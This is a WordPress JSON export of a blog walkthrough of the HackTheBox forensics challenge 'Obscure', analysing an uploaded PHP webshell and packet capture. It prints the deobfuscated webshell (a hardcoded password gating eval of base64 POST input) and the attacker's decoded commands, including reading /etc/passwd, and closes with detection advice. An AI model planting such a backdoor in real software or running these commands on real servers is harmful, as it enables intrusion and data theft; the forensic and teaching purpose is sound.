{"id":114,"date":"2025-09-02T09:00:00","date_gmt":"2025-09-02T09:00:00","guid":{"rendered":"https:\/\/justruss.tech\/?p=114"},"modified":"2026-05-15T10:34:55","modified_gmt":"2026-05-15T10:34:55","slug":"obsecure-easy","status":"publish","type":"post","link":"https:\/\/justruss.tech\/index.php\/2025\/09\/02\/obsecure-easy\/","title":{"rendered":"Obscure | HTB Forensics (Easy)"},"content":{"rendered":"<p>Obscure is an Easy-rated HackTheBox forensics challenge. You get a packet capture and a PHP webshell uploaded to a compromised Apache server via an arbitrary file upload vulnerability. The task is to analyse the shell and trace attacker activity through the traffic logs.<\/p>\n<h3>Analysing the webshell<\/h3>\n<p>The uploaded file is support.php. It is heavily obfuscated PHP using three layers: the outer layer is base64 encoded, the middle layer uses variable function calls to reconstruct strings, and the inner layer is the actual eval-based shell. Deobfuscating by replacing each layer with echo statements or running it through a PHP sandbox with eval replaced by print reveals the core:<\/p>\n<pre>&lt;?php\nif(isset($_POST[\"login\"])) {\n    if($_POST[\"login\"] === base64_decode(\"c2VjdXJlUGFzc3dvcmQx\")) {\n        $_SESSION[\"auth\"] = true;\n    }\n}\nif($_SESSION[\"auth\"]) {\n    eval(base64_decode($_POST[\"cmd\"]));\n}\n?&gt;<\/pre>\n<p>The login parameter accepts a hardcoded password that decodes to securePassword1. Once authenticated, the cmd parameter is base64 decoded and passed to eval. 
Functionally, this is a complete remote code execution backdoor in a few lines.<\/p>\n<h3>Following the traffic<\/h3>\n<pre>tshark -r obscure.pcap -Y \"http.request.method == POST and http contains \\\"support.php\\\"\" \\\n  -T fields -e frame.number -e http.file_data | head -30<\/pre>\n<p>Decoding the cmd field from each POST request in sequence reveals the attacker activity:<\/p>\n<pre>Request 3:  system('id');          # Response: www-data\nRequest 5:  system('cat \/etc\/passwd');\nRequest 8:  system('find \/ -name \"*.txt\" -readable 2&gt;\/dev\/null');\nRequest 11: system('cat \/var\/www\/html\/flag.txt');<\/pre>\n<p>Following the TCP stream for request 11 shows the flag in the HTTP response body.<\/p>\n<h3>Detection perspective<\/h3>\n<p>New PHP files appearing in upload directories, POST requests to paths that should only contain static files, and web server worker processes spawning system shells are the three layers where this attack is detectable. A web server spawning \/bin\/sh or cmd.exe should trigger an immediate alert in any environment with process creation monitoring.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>A walkthrough of the Obscure Easy forensics challenge on HackTheBox. An obfuscated PHP webshell uploaded to a compromised Apache server. 
Deobfuscation, traffic analysis, and flag recovery through Wireshark.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-114","post","type-post","status-publish","format-standard","hentry","category-hackthebox"],"_links":{"self":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/114","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/comments?post=114"}],"version-history":[{"count":9,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/114\/revisions"}],"predecessor-version":[{"id":345,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/114\/revisions\/345"}],"wp:attachment":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/media?parent=114"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/categories?post=114"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/tags?post=114"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}